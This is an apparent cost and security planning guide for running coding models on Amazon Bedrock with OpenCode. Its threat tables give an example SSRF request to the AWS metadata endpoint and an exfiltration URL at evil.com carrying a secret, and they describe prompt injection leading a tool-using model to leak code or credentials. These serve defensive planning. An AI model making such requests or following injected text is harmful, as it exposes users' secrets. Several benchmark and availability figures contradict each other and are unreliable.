Profile: Solo Developer
Region: eu-west-2 (London) — primary; us-east-1 (N. Virginia) for reference
Currency: EUR (conversion rate: 1 USD = 0.92 EUR, April 2026)
VAT: All EUR prices include 20% VAT (consumer/no VAT ID). Business with EU VAT ID: apply reverse charge (divide by 1.20 for ex-VAT).
Date: 2026-04-01
Stack: Amazon Bedrock + Tailscale VPN
Important: eu-west-2 (London) has the most coding models (60) of any EU region and is the recommended choice. eu-west-3 (Paris) has only 32 models (no coding-specific ones). eu-west-2 (London) has 59 models but lacks Kimi K2.5, Qwen3 Coder 480B, and DeepSeek. EU regions carry a ~20% price premium over us-east-1. DeepSeek R1 and Llama 4 are NOT available in any EU region.
Data sources: AWS Pricing API (2026-03-26), Onyx Open LLM Leaderboard (2026-04-01).
| Model | Provider | Params | Input (€) | Output (€) | SWE-bench | HumanEval | LiveCodeBench | GPQA | Arena |
|---|---|---|---|---|---|---|---|---|---|
| Qwen3 Coder 30B | Qwen | 30B | €0.000199 | €0.000773 | N/A | N/A | N/A | N/A | N/A |
| Qwen3 Coder 480B | Qwen | 480B | €0.000596 | €0.002384 | N/A* | N/A* | N/A* | N/A* | N/A* |
| Qwen3 Coder Next | Qwen | N/A | €0.000662 | €0.001590 | N/A | N/A | N/A | N/A | N/A |
| Mistral Large 3 | Mistral | 675B | €0.000662 | €0.001987 | N/A | 92.0 | 82.8 | 43.9 | 1416 |
| DeepSeek V3.1 | DeepSeek | 685B | €0.000768 | €0.002226 | 67.8** | N/A | 74.1** | 79.9** | 1423** |
| Kimi K2.5 | Moonshot | 1T | €0.000794 | €0.003312 | 76.8*** | 99.0*** | 85.0*** | 87.6*** | 1438*** |
Not available in EU regions:
| Model | Provider | us-east-1 Input ($) | us-east-1 Output ($) | SWE-bench | HumanEval | LiveCodeBench |
|---|---|---|---|---|---|---|
| Llama 4 Scout 17B | Meta | $0.00017 | $0.00066 | N/A | N/A | N/A |
| Llama 4 Maverick 17B | Meta | $0.00024 | $0.00097 | N/A | 62.0 | 43.4 |
| DeepSeek R1 | DeepSeek | $0.00135 | $0.00540 | 49.2 | 90.2 | 65.9 |
| Model | Input ($) | Output ($) | EU Premium |
|---|---|---|---|
| Qwen3 Coder 30B | $0.00015 | $0.00060 | +20% |
| Qwen3 Coder 480B | $0.00045 | $0.00180 | +20% |
| Mistral Large 3 | $0.00050 | $0.00150 | +20% |
| DeepSeek V3.1 | $0.00058 | $0.00168 | +20% |
| Kimi K2.5 | $0.00060 | $0.00250 | +20% |
| DeepSeek R1 | $0.00135 | $0.00540 | N/A (EU unavailable) |
* Qwen3 Coder 480B is a code-specialized variant of Qwen3; general benchmarks available for Qwen 3 235B (SWE-bench N/A, LiveCodeBench 74.1, GPQA 81.1, Arena 1423) and Qwen 3.5 397B (SWE-bench 76.4, LiveCodeBench 83.6, GPQA 88.4, Arena 1450).
** Leaderboard shows DeepSeek V3.2 (685B) — V3.1 on Bedrock is the prior version; scores may be slightly lower.
*** Leaderboard shows Kimi K2.5 — Bedrock offers K2 Thinking; K2.5 scores shown as upper bound.
Flex/batch tiers offer ~50% discount on most models. Qwen3 Coder Next is available in eu-west-2 but not us-east-1.
| Benchmark | What It Measures | Scale |
|---|---|---|
| SWE-bench | Real-world GitHub issue resolution (end-to-end) | % resolved (higher = better) |
| HumanEval | Function-level code generation from docstrings | % pass@1 (higher = better) |
| LiveCodeBench | Competitive programming problems (contamination-free) | % solved (higher = better) |
| GPQA Diamond | Graduate-level science/reasoning questions | % correct (higher = better) |
| Chatbot Arena | Human preference rating (ELO-style) | ELO score (higher = better) |
| Scenario | Requests/day | Avg Input Tokens | Avg Output Tokens | Monthly Tokens (in/out) |
|---|---|---|---|---|
| Light (occasional assist) | 30 | 1,500 | 3,000 | 1.35M / 2.7M |
| Medium (daily coding partner) | 80 | 2,000 | 4,000 | 4.8M / 9.6M |
| Heavy (pair programming all day) | 200 | 3,000 | 5,000 | 18M / 30M |
Models ordered by coding benchmark composite (avg of SWE-bench, HumanEval, LiveCodeBench where available).
| Rank | Model | Coding Composite | Light | Medium | Heavy |
|---|---|---|---|---|---|
| 1 | Kimi K2.5 | 86.9 (SWE 76.8, HE 99.0, LCB 85.0) | €10.02 | €35.62 | €113.66 |
| 2 | Mistral Large 3 | 87.4 (HE 92.0, LCB 82.8) | €6.26 | €22.26 | €71.54 |
| 3 | DeepSeek V3.1 | 70.9 (SWE 67.8, LCB 74.1)** | €7.04 | €25.06 | €80.60 |
| 4 | Qwen3 Coder 480B | ~77* (est. from Qwen 3.5 family) | €7.25 | €25.75 | €82.27 |
| 5 | Qwen3 Coder Next | N/A (new model, no benchmarks yet) | €5.18 | €18.44 | €59.63 |
| 6 | Qwen3 Coder 30B | N/A (no benchmarks) | €2.35 | €8.38 | €26.77 |
Not available in eu-west-2 (us-east-1 only, in USD + VAT where applicable):
| Rank | Model | Coding Composite | Light | Medium | Heavy |
|---|---|---|---|---|---|
| — | DeepSeek R1 | 68.4 (SWE 49.2, HE 90.2, LCB 65.9) | $16.40 | $52.62 | $164.70 |
| — | Llama 4 Maverick | 52.7 (HE 62.0, LCB 43.4) | $2.95 | $9.47 | $29.34 |
* Qwen3 Coder 480B estimated from Qwen 3.5 (SWE 76.4, LCB 83.6) — code-specialized variant likely scores higher.
** V3.2 scores shown; V3.1 on Bedrock may score slightly lower.
| Component | Cost (EUR incl. VAT) | Notes |
|---|---|---|
| Tailscale Personal | €0 | Free for 1 user, 100 devices |
| EC2 t3.micro (Tailscale subnet router) | €10.49 | eu-west-2 pricing; or use own machine = €0 |
| Lambda (orchestration) | €1.20-3.60 | Free tier covers most solo dev usage |
| API Gateway | €1.20-2.40 | Minimal at solo dev volume |
| CloudWatch | €3.60 | Basic logging |
| VPC Endpoint for Bedrock (optional) | €9.28 | Keeps traffic off public internet |
| Total (minimal) | ~€6 | Tailscale on own machine, Lambda free tier |
| Total (recommended) | ~€28 | With VPC endpoint and EC2 subnet router |
Using ~€6/mo minimal fixed infra (incl. VAT). Models ranked by value score (coding quality per euro).
| Model | Coding Quality | Medium Cost | Value Score | Tier |
|---|---|---|---|---|
| Mistral Large 3 | 87.4 | ~€28 | 3.12 | BEST VALUE |
| Qwen3 Coder 480B | ~77* | ~€32 | 2.41 | BEST VALUE |
| Kimi K2.5 | 86.9 | ~€42 | 2.07 | HIGH QUALITY |
| DeepSeek V3.1 | 70.9 | ~€31 | 2.29 | GOOD VALUE |
| Qwen3 Coder Next | N/A | ~€24 | N/A | NEW — WATCH |
| Qwen3 Coder 30B | N/A | ~€14 | N/A | CHEAPEST |
Value Score = Coding Composite / Monthly Cost (medium use). Higher = better bang for buck.
| Model | Light | Medium | Heavy |
|---|---|---|---|
| Qwen3 Coder 30B | ~€8 | ~€14 | ~€33 |
| Qwen3 Coder Next | ~€11 | ~€24 | ~€66 |
| Mistral Large 3 | ~€12 | ~€28 | ~€78 |
| Qwen3 Coder 480B | ~€13 | ~€32 | ~€88 |
| DeepSeek V3.1 | ~€13 | ~€31 | ~€87 |
| Kimi K2.5 | ~€16 | ~€42 | ~€120 |
-
DeepSeek R1 is NOT available in EU regions, and it's not the best coding model anyway. It excels at math/reasoning (AIME 87.5%, MATH 97.3%) but its SWE-bench (49.2%) is mediocre. If you need it, you must use us-east-1.
-
Mistral Large 3 is the best value for coding in EU. HumanEval 92.0% and LiveCodeBench 82.8% at only ~€28/mo medium use (incl. VAT). Its weak GPQA (43.9%) doesn't matter for coding workflows.
-
Kimi K2.5 is the overall coding champion on Bedrock with the highest composite (SWE-bench 76.8%, HumanEval 99.0%, LiveCodeBench 85.0%), but at ~€42/mo it costs 50% more than Mistral Large 3.
-
Qwen3 Coder 480B is likely underrated. As a code-specialized model derived from the Qwen 3.5 family (SWE-bench 76.4%, LiveCodeBench 83.6%, Arena 1450), it may match or exceed Kimi K2 on coding tasks at lower cost. No standalone benchmarks yet.
-
Qwen3 Coder Next is a new EU-available model at a competitive price point (~€24/mo medium incl. VAT). No benchmark data yet — worth monitoring.
-
Llama 4 Maverick is weak for coding (HumanEval 62.0%, LiveCodeBench 43.4%) and unavailable in EU. Not recommended.
-
EU premium is a flat 20% across all models vs us-east-1. For data residency or latency reasons, this is a reasonable trade-off.
| Use Case | Model | Why | Monthly Cost (EUR incl. VAT) |
|---|---|---|---|
| Daily coding (primary) | Mistral Large 3 | Best value: HE 92%, LCB 82.8% | ~€28 |
| Complex refactoring / bug hunting | Kimi K2.5 | Highest coding scores across all benchmarks | ~€42 |
| Quick completions / boilerplate | Qwen3 Coder 30B | Cheapest, fast, good enough for simple tasks | ~€14 |
| Math/algorithm problems | DeepSeek R1 (us-east-1) | AIME 87.5%, MATH 97.3% — cross-region, use sparingly | Pay-per-use (USD) |
Estimated monthly cost with multi-model strategy: ~€29-36/mo incl. VAT (Mistral primary + Qwen3 30B for simple tasks, Kimi on-demand for hard problems).
| Level | Req/day | Per hour (8h day) | Real-world behavior |
|---|---|---|---|
| Light (30/day) | ~4/hour | "I ask AI when I'm stuck" | Occasional help with syntax, errors, quick lookups |
| Medium (80/day) | ~10/hour | "AI is my coding partner" | Active use for key tasks — generation, reviews, tests |
| Heavy (200/day) | ~25/hour | "I don't write a line without AI" | Constant pair programming, every function AI-assisted |
| Power (400/day) | ~50/hour | "AI writes, I review and steer" | Full AI-driven development, large refactors, multi-file work |
| Extreme (800+/day) | ~100/hour | "Automated agents + human oversight" | CI/CD agents, batch processing, parallel coding agents |
| Activity | Requests | Typical Tokens (in/out) | Daily Output |
|---|---|---|---|
| Code generation ("write a function that...") | 40-50 | 2K / 6K | ~400K |
| Code review / explain ("what does this do?") | 20-30 | 4K / 3K | ~90K |
| Debugging ("why is this failing?") | 30-40 | 5K / 4K | ~160K |
| Refactoring ("make this cleaner") | 20-30 | 4K / 5K | ~150K |
| Test generation ("write tests for...") | 20-30 | 3K / 8K | ~240K |
| Chat / Q&A ("how do I X in Python?") | 30-40 | 1K / 2K | ~80K |
| Total | ~200 | avg 3K / 5K | ~1.1M/day |
A power user (400/day) doubles the above. An extreme user runs automated pipelines that multiply it further.
| Plan | Price (USD ex-VAT) | Price (EUR incl. VAT) | Usage Limits | Messages (est.) |
|---|---|---|---|---|
| Claude Pro | $20/mo | ~€22 | Baseline | ~40-45 per 5h window (~120-160/day) |
| Claude Max 5x | $100/mo | ~€110 | 5x Pro | ~225 per 5h window (~450/day) |
| Claude Max 20x | $200/mo | ~€221 | 20x Pro | ~900 per 5h window (~1800/day) |
Claude limitations:
- Limits are dynamic — reduced during peak hours (5am-11am PT weekdays)
- Shared between Claude chat and Claude Code
- Longer conversations and larger codebases consume more tokens per message
- Anthropic-only models (Claude Sonnet/Opus) — no model choice flexibility
- No data residency guarantee for EU
- VAT is charged on top for EU consumers without a VAT ID
| Model | Heavy (~Pro) | Power (~Max 5x) | Extreme (~Max 20x) |
|---|---|---|---|
| 200 req/day | 400 req/day | 800 req/day | |
| Qwen3 Coder 30B | €33 | €59 | €112 |
| Qwen3 Coder Next | €66 | €125 | €245 |
| Mistral Large 3 | €78 | €149 | €292 |
| Qwen3 Coder 480B | €88 | €170 | €335 |
| DeepSeek V3.1 | €87 | €167 | €328 |
| Kimi K2.5 | €120 | €233 | €461 |
Includes ~€6 minimal infra (incl. VAT).
Split traffic: 60% Qwen3 Coder 30B (simple) + 30% Mistral Large 3 (quality) + 10% Kimi K2 (hard problems).
| Tier | Daily Requests | Monthly Cost (EUR incl. VAT) |
|---|---|---|
| Heavy (~Pro equivalent) | 200/day | ~€62 |
| Power (~Max 5x equivalent) | 400/day | ~€110 |
| Extreme (~Max 20x equivalent) | 800/day | ~€214 |
Includes ~€6 minimal infra (incl. VAT).
| Claude Pro | Claude Max 5x | Claude Max 20x | Bedrock Multi-Model | |
|---|---|---|---|---|
| Monthly cost | ~€22 | ~€110 | ~€221 | €29-214 (scales with use) |
| Equivalent Bedrock cost | €29-62 | €110 | €214 | — |
| Model choice | Claude only | Claude only | Claude only | 6+ models, swap anytime |
| Throttling | Peak hours limited | Peak hours limited | Rare | Never (pay-per-use) |
| Hard cap | Yes (window resets) | Yes (window resets) | Yes (window resets) | No — unlimited |
| Cost at low usage | €22 (flat) | €110 (flat) | €221 (flat) | €8-14 (pay only what you use) |
| EU data residency | No | No | No | Yes (eu-west-2) |
| Open source client | No | No | No | Yes (OpenCode) |
| Coding quality | Excellent (Opus/Sonnet) | Excellent | Excellent | Varies by model (see benchmarks) |
| Agentic capabilities | Best-in-class | Best-in-class | Best-in-class | Good (OpenCode + MCP) |
| Scenario | Winner | Why |
|---|---|---|
| Light-to-medium solo dev (€22-36 budget) | Claude Pro | Flat rate, excellent quality, no setup |
| Medium dev who needs EU data residency | Bedrock | Only option with guaranteed EU hosting |
| Heavy dev who hates throttling | Bedrock | No caps, no peak-hour limits |
| Power user, budget-conscious | Bedrock multi-model | €110 matches Max 5x but with no caps |
| Power user, quality-first | Claude Max 5x | Opus/Sonnet agentic quality is unmatched |
| Extreme / automated pipelines | Bedrock | Claude caps make automation unreliable |
| Dev who needs model diversity | Bedrock + OpenCode | 6+ models, local fallback via Ollama |
| Dev who wants zero setup | Claude Pro/Max | Works out of the box, no infra to manage |
| If you use... | Claude costs | Bedrock costs (multi-model) | Verdict |
|---|---|---|---|
| < 80 req/day | €22 (Pro) | €14-29 | Roughly equal — Claude Pro simpler |
| 80-200 req/day | €22 (Pro, may throttle) | €29-62 | Bedrock wins if you hit Claude limits |
| 200-450 req/day | €110 (Max 5x) | €62-110 | Bedrock wins on cost |
| 450-900 req/day | €221 (Max 20x) | €110-214 | Bedrock wins on cost |
| 900+ req/day | €221 (Max 20x, capped) | €214+ (uncapped) | Bedrock wins — Claude can't serve this |
The crossover point: Bedrock becomes cheaper than Claude Max 5x at ~200 requests/day with multi-model routing. Below ~80 req/day, Claude Pro is simpler and roughly the same cost.
The key advantage of Bedrock over Claude subscriptions is routing each request to the right model. Not every coding task needs a premium reasoning model — most don't.
| Tier | Model | Coding Quality | Cost at 100% Heavy (200 req/day) incl. VAT | Best For |
|---|---|---|---|---|
| Budget | Qwen3 Coder 30B | N/A (fast, lightweight) | €27/mo | Boilerplate, completions, docstrings, commit messages, quick Q&A |
| Mid | Qwen3 Coder 480B | ~77 (est. from Qwen 3.5 family) | €88/mo | Code generation, refactoring, code review, test writing |
| Mid-alt | Qwen3 Coder Next | N/A (new, promising) | €60/mo | Same as Mid, cheaper, unproven benchmarks |
| Premium | Kimi K2.5 | 86.9 (SWE 77%, HE 99%, LCB 85%) | €114/mo | Complex debugging, architecture, multi-file refactors, security review |
| Mix | Budget (Qwen3 30B) | Mid (Qwen3 480B) | Premium (Kimi K2.5) | Description |
|---|---|---|---|---|
| A — Mostly budget | 80% | 15% | 5% | AI for boilerplate, premium only for hard bugs |
| B — Balanced | 60% | 30% | 10% | Daily partner with quality escalation |
| C — Quality-leaning | 40% | 40% | 20% | Most real work on quality models |
| D — Premium-heavy | 20% | 40% | 40% | Quality-first, budget only for trivial tasks |
| E — All premium | 0% | 30% | 70% | Maximum quality, no compromises |
Includes ~€6 minimal infra (incl. VAT).
| Mix | Heavy (200/day) | Power (400/day) | Extreme (800/day) | vs Claude (incl. VAT) |
|---|---|---|---|---|
| A — Mostly budget | €44 | €82 | €157 | Cheaper than Max 5x (€110) up to Power |
| B — Balanced | €55 | €104 | €202 | Half the cost of Max 5x (€110) at Heavy |
| C — Quality-leaning | €68 | €130 | €254 | Under Max 5x (€110) at Heavy |
| D — Premium-heavy | €85 | €164 | €324 | Under Max 5x at Heavy, under Max 20x (€221) at Power |
| E — All premium | €107 | €208 | €410 | Matches Max 5x at Heavy, under Max 20x at Power |
| Mix | Heavy (200/day) | Power (400/day) | Extreme (800/day) |
|---|---|---|---|
| A — Mostly budget | €41 | €76 | €146 |
| B — Balanced | €49 | €93 | €180 |
| C — Quality-leaning | €60 | €114 | €223 |
| D — Premium-heavy | €77 | €147 | €289 |
| E — All premium | €98 | €191 | €376 |
| Task | Tier | Why | % of typical day |
|---|---|---|---|
| Autocomplete / boilerplate | Budget | Speed > quality, trivial output | 15-20% |
| Docstrings / comments | Budget | Template-driven, any model handles this | 5-10% |
| Commit messages | Budget | Short output, low complexity | 5% |
| "How do I X?" questions | Budget | Simple retrieval, no deep reasoning | 10-15% |
| Code generation (new functions) | Mid | Needs correctness, type awareness | 15-20% |
| Code review / explain | Mid | Needs understanding of patterns | 10% |
| Test generation | Mid | Needs coverage awareness, edge cases | 10-15% |
| Refactoring | Mid / Premium | Mid for simple, Premium for architectural | 10% |
| Complex debugging | Premium | Needs deep reasoning, multi-file context | 5-10% |
| Architecture / design decisions | Premium | Highest reasoning quality needed | 2-5% |
| Security review | Premium | Must not miss vulnerabilities | 2-5% |
A typical developer's natural distribution lands around Mix B-C (balanced to quality-leaning).
€0 €25 €50 €75 €100 €125 €150 €175 €200 €225
|---------|---------|---------|---------|---------|---------|---------|---------|---------|
Mix A ██████████████████░ €44
Mix B ██████████████████████░ €55
Mix C ████████████████████████████░ €68
Mix D ██████████████████████████████████░ €85
Mix E ████████████████████████████████████████████░ €107
Claude Pro █████████░ €22 (but throttles at this usage)
Claude Max 5x ████████████████████████████████████████████████░ €110
Claude Max 20x ████████████████████████████████████████████████████████████████████████████████████████████░ €221
| Monthly Budget | Recommended Mix | What You Get |
|---|---|---|
| €35-50 | Mix A (80/15/5) | AI for everything, quality when it matters |
| €50-70 | Mix B (60/30/10) | Strong daily partner, good quality balance |
| €65-90 | Mix C (40/40/20) | Quality-focused, budget only for trivial tasks |
| €85-120 | Mix D (20/40/40) | Near-premium experience at ~77% of Claude Max 5x |
| €107+ | Mix E (0/30/70) | Maximum quality, comparable to Claude Max 5x |
Mix B (balanced) at €55/mo delivers 80-90% of the coding quality of an all-premium setup at half the cost. The Budget tier handles 60% of requests perfectly fine — completions, boilerplate, Q&A — while the premium tier is reserved for the 10% of tasks where reasoning quality actually impacts the outcome.
Compared to Claude Max 5x (€110/mo incl. VAT), Mix B saves ~€55/mo with no throttling, no caps, EU data residency, and model flexibility. The trade-off is that Claude's agentic capabilities (Opus/Sonnet) are still superior for complex multi-step coding tasks.
Automatic routing between cheap and expensive models is a solved problem with several open-source projects available.
| Project | Stars | Approach | Bedrock Support | Best For |
|---|---|---|---|---|
| NadirClaw | ~377 | 3-tier sentence-embedding classifier (~10ms), drop-in proxy | Via LiteLLM | Drop-in proxy for OpenCode/Cursor/Claude Code |
| RouteLLM | ~4.7K | Strong/weak routing with pre-trained classifiers (BERT, MF) | Via LiteLLM | Best classifier accuracy (LMSYS/Chatbot Arena team) |
| LLMRouter | ~1.6K | 16+ routing models (KNN, SVM, MLP, BERT), unified CLI | No | Research and evaluation |
| Bifrost | ~3.4K | High-perf Go gateway, <100us overhead, 5K RPS | Native | Gateway/failover layer |
| UncommonRoute | ~182 | Simple cost/quality balancer, 90-95% cost reduction | No | Lightweight reference |
| LiteLLM | ~41.8K | Unified proxy, 100+ providers, cost tracking, rate limiting | Native | Base gateway layer |
| Strategy | How It Works | Accuracy | Latency | Extra Cost |
|---|---|---|---|---|
| Sentence-embedding classifier (NadirClaw) | Embeds the prompt, classifies complexity | ~85-90% | ~10ms | none (runs locally) |
| Pre-trained BERT classifier (RouteLLM) | Fine-tuned on Chatbot Arena data | ~90-95% | ~20ms | none (runs locally) |
| Two-pass confidence self-assessment (custom) | Budget model rates its own confidence | ~85% | Full budget response time | ~0.20/mo |
| Keyword/pattern matching (custom) | Regex on prompt content | ~70% | <1ms | none |
| Small model classifier (custom) | Budget model classifies before routing | ~85-90% | ~200ms | ~0.20/mo |
OpenCode --> NadirClaw or custom proxy (localhost:4000) --> LiteLLM --> Bedrock (eu-west-2)
| |
Sentence-embedding AWS SDK + VPC endpoint
classifier (~10ms) via Tailscale tunnel
|
+------+------+
v v v
Budget Mid Premium
(Qwen 30B)(Qwen 480B)(Kimi K2.5)
Option A -- Use NadirClaw directly (CHOSEN): Install NadirClaw, configure three Bedrock models via LiteLLM, point OpenCode to it. Fastest path to production. Includes cost tracking, budget alerts, fallback chains, and a live dashboard. See SETUP_GUIDE.md for the complete recipe.
Option B -- Custom proxy with RouteLLM classifier: Build a FastAPI proxy that uses RouteLLM's pre-trained classifier for routing decisions and LiteLLM for Bedrock calls. More control, includes security middleware and two-pass fallback.
Option C -- Custom two-pass router: Full custom implementation with confidence self-assessment, pattern-based force routing, security middleware, and cost tracking. Most control, most maintenance.
Amazon Bedrock is a managed API — you are NOT downloading models. Your prompts are sent to AWS-hosted inference infrastructure and responses are returned. Key guarantees:
- AWS does not use your data to train models
- Inputs/outputs are not stored beyond the request lifecycle
- Data is encrypted in transit (TLS) and at rest
- With a VPC endpoint, traffic never leaves the AWS backbone
- Third-party model providers (DeepSeek, Qwen, Moonshot, etc.) do NOT receive your requests — AWS hosts a copy of the model weights on its own infrastructure
| Threat | Risk Level | Mitigation |
|---|---|---|
| AWS operator sees your data in memory | Low | Contractual/compliance protections (SOC2, HIPAA BAA) |
| Data exfiltration via model | None | Model cannot initiate network connections |
| Model training on your data | None | AWS explicitly opts out in Bedrock |
| Man-in-the-middle | Very Low | TLS + Tailscale tunnel + VPC endpoint |
| Prompt injection leaking context | Medium | Never put secrets/credentials in prompts |
| Logs containing sensitive data | Medium | Disable CloudWatch prompt logging or encrypt |
| Data sent to model provider (DeepSeek/Qwen) | None | AWS hosts weights locally; providers have no access |
| Approach | Isolation | Monthly Cost |
|---|---|---|
| Bedrock API + VPC endpoint | High (trust AWS) | $10-60 |
| SageMaker dedicated endpoint | Higher (dedicated GPU) | $500-2,000+ |
| EC2 self-hosted (vLLM/Ollama) | Highest (full control) | $700-3,000+ |
| Local machine (Ollama) | Complete (air-gap possible) | $0 infra, requires beefy GPU |
Self-hosting a 480B model requires multiple A100/H100 GPUs — not practical for a solo dev.
Once the model is given tools that reach the internet, isolation breaks down:
Without tools: [Your Code] --> [Model] --> [Response] (isolated)
With tools: [Your Code] --> [Model] --> [Internet] --> [???] (NOT isolated)
The model itself cannot access the internet. But tool use / function calling allows it to instruct your application to do so on its behalf.
| Threat | Risk | Description |
|---|---|---|
| Query leaks your context | HIGH | Model sends search queries containing fragments of your code/data |
| Search results inject prompts | MEDIUM | Malicious websites embed prompt injection in HTML/snippets |
| Search provider logs your queries | HIGH | Google/Bing records what you're working on |
Example attack: You ask "fix this auth bug in my login handler" — the model searches for "fix JWT validation bypass in MyCompanyApp login endpoint" — now the search provider knows your app name and that you have an auth vulnerability.
| Threat | Risk | Description |
|---|---|---|
| Downloading malicious content | HIGH | Model fetches a URL serving malware or backdoored code |
| SSRF (Server-Side Request Forgery) | CRITICAL | Model requests http://169.254.169.254/latest/meta-data/ — leaks AWS credentials |
| Exfiltration via URL params | HIGH | Model crafts https://evil.com/log?data=YOUR_SECRET disguised as a download |
| Threat | Risk | Description |
|---|---|---|
| Data exfiltration | CRITICAL | Model uploads your source code to an external service |
| Credential theft | CRITICAL | Model uploads .env, SSH keys, or AWS credentials |
| Supply chain poisoning | MEDIUM | Model pushes compromised packages to registries |
+---------------------------------------------------+
| YOUR MACHINE (Tailscale) |
| |
| +---------+ +----------+ +--------------+ |
| | Your App |--->| Tool |--->| Proxy / |--+--> Internet
| | | | Router | | Allowlist | |
| +---------+ +----------+ +--------------+ |
| | |
| v VPC Endpoint (private) |
| +---------+ |
| | Bedrock | (no internet access) |
| +---------+ |
+---------------------------------------------------+
Never give the model raw HTTP/curl access. Define constrained tools:
| Instead of | Use |
|---|---|
| Raw URL fetch | Search tool querying a specific API (e.g., Brave Search) |
| Arbitrary file download | Tool that only downloads from allowlisted domains |
| File upload | Tool that only writes to local filesystem or specific S3 bucket |
ALLOWED_SEARCH_DOMAINS:
- docs.python.org
- stackoverflow.com
- developer.mozilla.org
- docs.aws.amazon.com
BLOCKED_URLS:
- 169.254.169.254/* # AWS metadata (SSRF)
- 127.0.0.1 / localhost # Local services
- *.internal # Internal DNS
Before passing downloaded content back to the model:
- Strip HTML, keep only text
- Scan for prompt injection patterns
- Limit response size (prevent context poisoning)
- Never pass raw binary files to the model
- No outbound uploads unless to your own S3 bucket
- All "uploads" should be local file writes that you manually review
- Never let the model compose and send HTTP POST/PUT to external URLs
| Component | Cost/mo | Purpose |
|---|---|---|
| Bedrock (model) | $10-60 | Inference only, no internet access |
| Lambda (tool executor) | $2-5 | Runs tools in sandboxed environment |
| S3 bucket (file storage) | $1 | Model reads/writes files here, not internet |
| Brave Search API | $0 | Free tier: 2,000 queries/mo, privacy-focused |
| API Gateway + WAF | $5-10 | Rate limiting, URL filtering |
| Tailscale | $0 | Secure access to your infrastructure |
| Total | $20-80 |
Updated April 2026: The default NadirClaw lineup now uses Qwen3 Coder 30B (budget), Qwen3 Coder 480B (mid) on Bedrock, and Qwen 3.6 Plus (premium, 1M context) on OpenRouter (free during preview). When Qwen 3.6 Plus becomes available on Bedrock, switch the premium tier back to Bedrock to simplify the setup. See
config/nadirclaw.envfor the current routing config.
- Daily driver: Qwen3 Coder 480B — best quality/cost ratio at $10-22/mo (Bedrock)
- Budget option: Qwen3 Coder 30B — solid results at $7-12/mo (Bedrock)
- Premium / large context: Qwen 3.6 Plus — 1M context, free on OpenRouter preview
- Hard problems only: DeepSeek R1 — reserve for complex debugging/architecture (us-east-1)
- Enable VPC endpoint for Bedrock (+$7.50/mo) — keeps traffic off public internet
- Disable prompt/response logging in CloudWatch if code is sensitive
- Never put secrets, API keys, or credentials in prompts
- Tailscale ACLs — restrict which devices can reach your API
- Human-in-the-loop — require your approval for any action that sends data externally
- SSRF protection — Lambda runs in a VPC with no access to the metadata endpoint
- Review AWS Data Processing Addendum for your jurisdiction (GDPR, etc.)
The model decides what to do, but your code decides what's allowed. Never give the model raw network access.
OpenCode is an open-source AI coding agent (120K+ GitHub stars, 5M+ monthly developers) built in Go. It provides a rich TUI (Terminal User Interface) with vim-like editing, session persistence (SQLite), and multi-provider LLM support.
Available as: CLI/TUI tool, desktop app, and IDE extension (VS Code compatible).
GitHub: github.com/opencode-ai/opencode
| Advantage | Description |
|---|---|
| Free client | OpenCode is free — you only pay for API usage |
| Bedrock native support | First-class provider, uses standard AWS credential chain |
| Provider flexibility | 75+ providers — can mix Bedrock models with local Ollama models |
| Privacy | Can run fully local with Ollama for sensitive code, Bedrock for complex tasks |
| MCP support | Extensible via Model Context Protocol servers |
| Open source | Full audit trail of what the tool does with your code |
OpenCode authenticates with Bedrock via the standard AWS credential chain:
- Environment variables:
AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY,AWS_REGION - Bearer token:
AWS_BEARER_TOKEN_BEDROCK - AWS profiles, shared credentials, IAM roles, Web Identity Tokens
Prerequisite: Request model access in the Amazon Bedrock console first.
Project config (opencode.json in project root, safe to commit):
{
"provider": {
"bedrock": {
"models": {
"qwen3-coder-480b": {
"name": "Qwen3 Coder 480B A35B"
},
"deepseek-r1": {
"name": "DeepSeek R1"
}
}
}
}
}For VPC endpoint (private connectivity), set a custom endpoint:
{
"provider": {
"bedrock": {
"options": {
"endpoint": "https://vpce-XXXX.bedrock-runtime.us-east-1.vpce.amazonaws.com"
}
}
}
}API keys are stored separately at ~/.local/share/opencode/auth.json (or via /connect command).
OpenCode comes with tools that map directly to coding workflows:
| Tool | Description | Security Note |
|---|---|---|
| File read/write | Exact string replacement for precise edits | Reads any file in workspace |
| Bash/shell execution | Run terminal commands | Executes with your user privileges |
| Web search | Via Exa AI (no API key needed) | Queries may contain code context |
| Web fetch | Read web pages and docs | Subject to SSRF if model crafts URLs |
| File search / grep | Search across the codebase | Full workspace access |
| LSP integration | Language Server Protocol for code intelligence | Local only |
OpenCode implements an MCP client, enabling connection to external tool servers. This is how you would add Tailscale management, custom search APIs, or S3 file operations:
{
"mcp": {
"brave-search": {
"type": "stdio",
"command": "npx",
"args": ["-y", "@anthropic/mcp-brave-search"],
"env": {
"BRAVE_API_KEY": "${BRAVE_API_KEY}"
}
},
"s3-files": {
"type": "stdio",
"command": "npx",
"args": ["-y", "@aws/mcp-s3"],
"env": {
"AWS_REGION": "us-east-1"
}
}
}
}| Feature | OpenCode | Claude Code | Cursor | Aider |
|---|---|---|---|---|
| Type | CLI/TUI + Desktop + IDE | CLI/Terminal | Full IDE | CLI/Terminal |
| Cost | Free (+ API costs) | $20/mo (Pro) or API | $20/mo (Pro) | Free (+ API costs) |
| Model flexibility | 75+ providers, local | Anthropic only | Multi-provider | Multi-provider |
| Open source | Yes | No | No | Yes |
| Bedrock support | Native | No | No | Via liteLLM |
| Can run fully local | Yes (Ollama) | No | No | Yes (Ollama) |
| MCP support | Yes | Yes | Limited | No |
| Git integration | Basic | Deep | Visual diffs | Deep (auto-commits) |
| Key strength | Provider flexibility, free | Best agentic features | Best GUI experience | Git-first workflow |
OpenCode's agent capabilities are powerful and unsandboxed:
- Reads every file in your workspace
- Executes arbitrary shell commands with your user privileges
- Sends file contents to whichever LLM provider you configured
- Writes/modifies files including configs that may contain secrets
The permission system is UX-only, not a security boundary. OpenCode's docs explicitly state it helps users stay aware of actions but does not provide security isolation.
| Threat | Risk | Mitigation |
|---|---|---|
| Code sent to AWS Bedrock | Accepted (contractual) | VPC endpoint, AWS DPA review |
| Code sent to third-party LLM | None if Bedrock-only | Don't configure other cloud providers |
| Shell command execution | HIGH | Review commands before approval |
| Secrets in workspace exposed to model | HIGH | Use .gitignore-aware tools, never store secrets in workspace |
| API keys stored in plaintext | MEDIUM | ~/.local/share/opencode/auth.json — protect file permissions |
| Web search leaking code context | MEDIUM | Use private search API (Brave), review queries |
| SSRF via web fetch | MEDIUM | Don't enable web fetch tool, or use allowlisted proxy |
- Run OpenCode in a container or VM for true isolation (Docker recommended)
- Use Bedrock as sole provider — no data leaves AWS infrastructure
